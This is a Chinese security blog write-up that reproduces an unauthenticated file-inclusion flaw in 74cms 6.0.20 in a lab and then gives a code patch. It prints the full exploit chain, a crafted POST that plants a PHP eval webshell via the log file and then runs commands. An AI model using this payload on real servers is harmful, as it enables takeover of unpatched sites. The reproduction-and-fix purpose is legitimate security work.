分享好友 最新动态首页 最新动态分类 切换频道
74cms 6.0.20版本文件包含漏洞复现
2024-12-27 00:41

74cms 6.0.20版本文件包含漏洞复现

✎ 阅读须知

乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经授权,不得用于其他。

01 漏洞描述

参考资料:

由于74CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。

下载地址:

注意:

    本文复现版本:

    74cms_Home_Setup_v6.0.20.zip

    02 环境搭建

    74cms_Home_Setup_v6.0.20.zip

    注意:

    php版本为5.x,暂不支持php7

    具体的搭建流程可以参考互联网,因为很简单。

    03 复现流程

      http://10.211.55.9/74cms//index.php?m=home&a=assign_resume_tpl

          http://10.211.55.9/74cms//index.php?m=home&a=assign_resume_tplPOST:variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php eval($_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

          此时去看日志信息,一句话菜刀已经记录在日志里

            http://10.211.55.9/74cms//index.php?m=home&a=assign_resume_tplPOST:variable=1&tpl=data/Runtime/Logs/Home/21_01_20.log

            在根目录下写入shell.php文件,内容为一句话木马,包含成功

            在cms系统安装的根目录下生成了一个shell.php一句话木马,密码是x

            http://10.211.55.9/74cms/shell.php

            执行任意命令,发现执行成功

            04 漏洞修复

              未修改前:

              public function assign_resume_tpl($variable,$tpl){        foreach ($variable as $key => $value) {            $this->assign($key,$value);        }        return $this->fetch($tpl);

              加入下面这行代码:

              $view = new ThinkView;        $tpl_file = $view->parseTemplate($tpl);        if(!is_file($tpl_file)){            return false;        } // 修改之后的代码 public function assign_resume_tpl($variable,$tpl){        foreach ($variable as $key => $value) {            $this->assign($key,$value);        } // fix 20210203 $view = new ThinkView;        $tpl_file = $view->parseTemplate($tpl);        if(!is_file($tpl_file)){            return false;        }        return $this->fetch($tpl);    }

                View.class.php文件中106行fetch方法中修改  // 将110行 if(!is_file($templateFile)) E(L('_TEMPLATE_NOT_EXIST_').':'.$templateFile); // 代码注释替换为 if(!is_file($templateFile)) E(L('_TEMPLATE_NOT_EXIST_'));

                05 修复验证

                    写入失败,漏洞修复成功

                    最新文章
                    直播软件搭建要求有哪些-从技术到硬件配置全方位解析!
                    直播软件搭建的要求是一个多方面的问题,涵盖了技术、硬件、软件以及网络等多个领域。搭建直播平台不仅需要考虑到用户体验的流畅性,还要确保平台的安全性和可扩展性。为了确保直播软件的成功搭建,开发者需要满足一定的技术要求,合理配置
                    科技早报|谷歌深夜发布最新大模型;马斯克成身家超4000亿美元“第一人”
                    12月11日,据媒体援引知情人士消息报道,苹果正在研发专门为人工智能设计的服务器芯片,并正与博通合作开发该芯片的网络技术。新芯片的内部代号为Baltra,预计到2026年可量产。这也标志着苹果芯片团队一个新的里程碑,该团队最初为iPhone设
                    日常TikToK达人邀约,第三方工具靠不靠谱?
                    目前做的卖家在经历过1-3个月以后都会面临瓶颈期,手动达人逐个邀约每天大约也就50个左右已经无法满足经营需求,所以卖家朋友会选择第三方达人建联工具实现突破,相比于手动建联,确实极大的提高了建联效率,但是是不是使用了第三方建联工
                    笔记本电脑功率详解:影响因素、计算方式与应用场景
                    一、笔记本电脑功率概述笔记本电脑功率是指笔记本在运行过程中所需的能量,通常以瓦(W)为单位表示。功率是影响笔记本电脑性能的重要因素之一,了解笔记本功率可以帮助我们更好地选择适合自己需求的电脑。二、影响笔记本电脑功率的因素1.
                    运营干货|| 亚马逊广告关键词匹配方式及使用场景,让你的流量更精准 Keyboards 2
                    一谈到广告,关键词就是一个绕不开的话题,也是我们在广告运营中的重中之重。所以,我打算将亚马逊上关键词的内容,分成8篇的更新,从0-1带你全方位的了解亚马逊关键词的基础概念到高阶运营中的用法。在之前的文章中已经更新了亚马逊关键词
                    郑州企业专属网络名片定制专家,助力品牌飞跃
                    郑州专业网站搭建团队,专注于为企业量身定制专属网络名片,助力品牌形象提升与市场拓展,推动企业腾飞。郑州专业网站搭建团队的核心优势挑选郑州专业网站搭建团队的策略塑造企业独特的网络形象在互联网迅猛发展的今天,网络营销日益成为企
                    教你如何获取root权限认识ROOT怎么使用教程(图)
                    手机越用越智能,而系统定制又包含较多无用的应用,对于玩机爱好者来说,这是多么多么郁闷的一件事;更为重要的是,高玩们更喜欢DIY,喜欢那种控制的快感!所以今天就给大家说说Android手机ROOT权限的获取(iOS的越狱、塞班的xx、Meego的RO
                    郑州电子中专学校专业介绍 学费多少 2024招生简章
                    在当今信息技术日新月异的时代,职业教育成为连接梦想与现实的桥梁。郑州电子中专学校,作为一所集专业技能培训与理论知识传授于一体的优秀中等专业学校,致力于培养适应市场需求的高素质技能型人才。本文将详细介绍郑州电子中专学校的专业
                    股票行情快报:华测导航(300627)12月12日主力资金净卖出2432.67万元
                    证券之星消息,截至2024年12月12日收盘,华测导航(300627)报收于42.01元,下跌0.4%,换手率2.29%,成交量10.38万手,成交额4.35亿元。12月12日的资金流向数据方面,主力资金净流出2432.67万元,占总成交额5.59%,游资资金净流入2430.27万元
                    白小姐三肖三期必出一期开奖虎年,深度策略应用数据_4K版15.974
                    白小姐三肖三期必出一期开奖虎年,这一深度策略应用数据_4K版15.974的预测模型,近年来在彩票界引起了广泛关注。该模型以其独特的算法和数据分析能力,为彩民提供了一种全新的彩票预测方式。本文将深入探讨这一模型的工作原理、优势以及其
                    相关文章
                    推荐文章
                    发表评论
                    0评